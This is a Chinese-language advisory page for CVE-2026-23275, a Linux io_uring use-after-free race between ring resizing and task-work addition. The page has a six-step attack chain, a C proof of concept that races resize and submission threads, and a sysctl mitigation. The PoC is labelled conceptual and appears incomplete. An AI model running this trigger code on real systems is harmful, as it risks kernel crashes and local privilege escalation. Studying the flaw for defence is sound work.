CVE-2026-23275 CVSS 7.8 高危

CVE-2026-23275 Linux内核io_uring竞态条件漏洞

披露日期: 2026-03-20

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-23275

漏洞类型

竞态条件

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的io_uring子系统存在一个竞态条件漏洞。该漏洞发生在启用DEFER_TASKRUN和SETUP_TASKRUN模式时，若在调整环大小的过程中并发添加任务工作，可能导致在旧环被释放后仍对其进行操作。这会造成内存破坏，本地攻击者可利用此漏洞提升权限，导致系统机密性、完整性和可用性受损。

技术细节

此漏洞的核心是Linux内核io_uring子系统在处理环形缓冲区调整大小与任务工作调度时的竞态条件。具体而言，当应用程序启用了DEFER_TASKRUN和SETUP_TASKRUN标志时，io_uring允许延迟任务运行。在调整环大小的过程中，内核会分配新的内存区域，更新ctx->rings指针指向新区域，并释放旧的内存区域。然而，对任务工作标志（如IORING_SQ_TASKRUN）的修改操作通常在RCU回调上下文中进行，且未严格检查指针的有效性。在旧环指针被释放与新指针完全生效的时间窗口内，如果并发触发了任务工作添加操作，内核可能尝试对已释放的旧环内存进行写入操作。这种释放后重用（UAF）行为可导致内核崩溃或更严重的后果，如任意代码执行，从而帮助本地攻击者从低权限提升至Root权限。

攻击链分析

STEP 1

步骤1

攻击者获取本地低权限用户访问权限。

STEP 2

步骤2

攻击者创建一个启用了IORING_SETUP_DEFER_TASKRUN标志的io_uring实例。

STEP 3

步骤3

攻击者创建多个线程，其中一个线程不断调用io_uring调整大小操作（resize）。

STEP 4

步骤4

另一个线程不断提交IO请求以触发任务工作添加。

STEP 5

步骤5

通过精确的时序控制，触发竞态条件，使得在旧环内存被释放后，任务工作代码仍尝试访问并修改该内存区域。

STEP 6

步骤6

成功利用该漏洞可能导致内核崩溃或执行任意代码，从而实现本地权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <liburing.h>
#include <pthread.h>
#include <stdio.h>
#include <unistd.h>

// Conceptual PoC for CVE-2026-23275
// This code attempts to trigger the race condition between
// io_uring resize and task work addition.

struct io_uring ring;

void* resize_thread_func(void* arg) {
    while (1) {
        // Constantly resize the ring to trigger the vulnerable window
        // where ctx->rings is swapped and old one is freed.
        io_uring_queue_resize(&ring, 32);
        io_uring_queue_resize(&ring, 64);
    }
    return NULL;
}

void* task_work_thread_func(void* arg) {
    while (1) {
        // Submit operations to trigger task work.
        // This attempts to hit the ctx->rings access during the swap.
        struct io_uring_sqe *sqe = io_uring_get_sqe(&ring);
        if (sqe) {
            io_uring_prep_nop(sqe);
            io_uring_submit(&ring);
        }
    }
    return NULL;
}

int main() {
    // Setup io_uring with DEFER_TASKRUN
    struct io_uring_params p = {0};
    // Note: Actual flag values depend on kernel headers
    p.flags = IORING_SETUP_DEFER_TASKRUN; 

    if (io_uring_queue_init_params(32, &ring, &p) < 0) {
        perror("io_uring_queue_init_params");
        return 1;
    }

    pthread_t t1, t2;
    pthread_create(&t1, NULL, resize_thread_func, NULL);
    pthread_create(&t2, NULL, task_work_thread_func, NULL);

    pthread_join(t1, NULL);
    pthread_join(t2, NULL);

    return 0;
}

影响范围

Linux Kernel（修复补丁前）

防御指南

临时缓解措施

可以通过设置内核参数限制非特权用户使用io_uring特性（如设置kernel.io_uring_disabled为1或2），以减轻潜在风险，直至系统完成内核升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表